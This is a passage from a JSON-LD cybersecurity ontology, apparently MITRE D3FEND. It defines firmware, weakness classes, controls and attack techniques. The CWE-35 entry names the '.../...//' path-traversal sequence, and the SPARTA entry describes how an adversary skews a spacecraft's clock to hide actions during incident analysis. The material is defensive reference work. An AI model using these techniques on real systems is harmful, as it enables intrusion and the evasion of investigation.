      }
    },
    {
      "@id": "d3f:Grouping",
      "@type": "owl:Class",
      "rdfs:label": "Grouping",
      "rdfs:subClassOf": {
        "@id": "d3f:Summarizing"
      }
    },
    {
      "@id": "d3f:SystemFirmware",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Firmware that is installed on a computer's main board which manages the initial boot process. It can also continue to run or function after the operating system boots.",
      "rdfs:label": "System Firmware",
      "rdfs:subClassOf": {
        "@id": "d3f:Firmware"
      },
      "skos:altLabel": [
        "BIOS Firmware",
        "UEFI Firmware"
      ]
    },
    {
      "@id": "d3f:CWE-35",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-35",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '.../...//' (doubled triple dot slash) sequences that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Path Traversal: '.../...//'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-23"
      }
    },
    {
      "@id": "d3f:Reference-RFC7642SystemForCrossDomainIdentityManagementDefinitionsOverviewConceptsAndRequirements",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://datatracker.ietf.org/doc/html/rfc7642"
      },
      "d3f:kb-abstract": "The System for Cross-domain Identity Management (SCIM) specification is designed to manage user identity in cloud-based applications and services in a standardized way to enable interoperability, security, and scalability.  The specification suite seeks to build upon experience with existing schemas and deployments, placing specific emphasis on simplicity of development and integration, while applying existing authentication, authorization, and privacy models.  The intent of the SCIM specification is to reduce the cost and complexity of user management operations by providing a common user schema and extension model, as well as binding documents to provide patterns for exchanging this schema using standard protocols.  In essence, make it fast, cheap, and easy to move users in to, out of, and around the cloud.",
      "d3f:kb-author": "K. LI, B. Khasnabish, A. Nadalin, Z. Zeltsan",
      "d3f:kb-organization": "IETF",
      "d3f:kb-reference-of": {
        "@id": "d3f:AccessModeling"
      },
      "d3f:kb-reference-title": "RFC7642: System for Cross-domain Identity Management: Definitions, Overview, Concepts, and Requirements",
      "rdfs:label": "Reference - RFC 7642: System for Cross-domain Identity Management: Definitions, Overview, Concepts, and Requirements"
    },
    {
      "@id": "d3f:CWE-613",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-613",
      "d3f:definition": "According to WASC, \"Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization.\"",
      "rdfs:label": "Insufficient Session Expiration",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-672"
      }
    },
    {
      "@id": "d3f:ComputerCabinet",
      "@type": "owl:Class",
      "d3f:definition": "A computer cabinet houses one or more computers and can range in size and material.",
      "rdfs:label": "Computer Cabinet",
      "rdfs:seeAlso": [
        "IEEE C37.20.2",
        "https://dbpedia.org/page/Computer_cabinet"
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:ComputerEnclosure"
      }
    },
    {
      "@id": "d3f:DE-0003.09",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0003.09",
      "d3f:definition": "The adversary biases the spacecraft’s authoritative time so that telemetry, event logs, and command histories appear shifted or inconsistent. By writing clock registers, altering disciplining sources (e.g., GNSS vs. free-running oscillator), or tweaking distribution services and offsets, they can make stored commands execute “earlier” or “later” on the timeline and misalign acknowledgments with actual actions. Downlinked frames still carry plausible timestamps near packet headers, but those stamps no longer reflect when data was produced, complicating reconstruction of sequences and masking causality during incident analysis.",
      "d3f:modifies": {
        "@id": "d3f:SystemTime"
      },
      "rdfs:label": "System Clock for Evasion - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/09/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DE-0003"
        },
        {
          "@id": "_:N457bd2c179e94fd98b90e443888131b7"
        }
      ],
      "skos:prefLabel": "System Clock for Evasion"
    },
    {
      "@id": "_:N457bd2c179e94fd98b90e443888131b7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemTime"
      }
    },
    {
      "@id": "d3f:CCI-002282_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system maintains the association of organization-defined security attributes to organization-defined objects.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002282"
    },
    {
      "@id": "d3f:ATLASAIModelAccessTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0000"
      },
      "rdfs:label": "AI Model Access Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:N2c9ae2b039c341e2a7d91936acc987a4"
        }
      ],
      "skos:prefLabel": "AI Model Access Technique"
    },
    {
      "@id": "_:N2c9ae2b039c341e2a7d91936acc987a4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0000"
      }
    },
    {
      "@id": "d3f:Link",
      "@type": "owl:Class",
      "d3f:definition": "A link is a connection or association between two entities that facilitates communication, interaction, or data transfer.",
      "rdfs:label": "Link",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/resource/Link"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:D3FENDCore"
        },
        {
          "@id": "d3f:DigitalInformationBearer"
        }
      ]
    }
  ]
}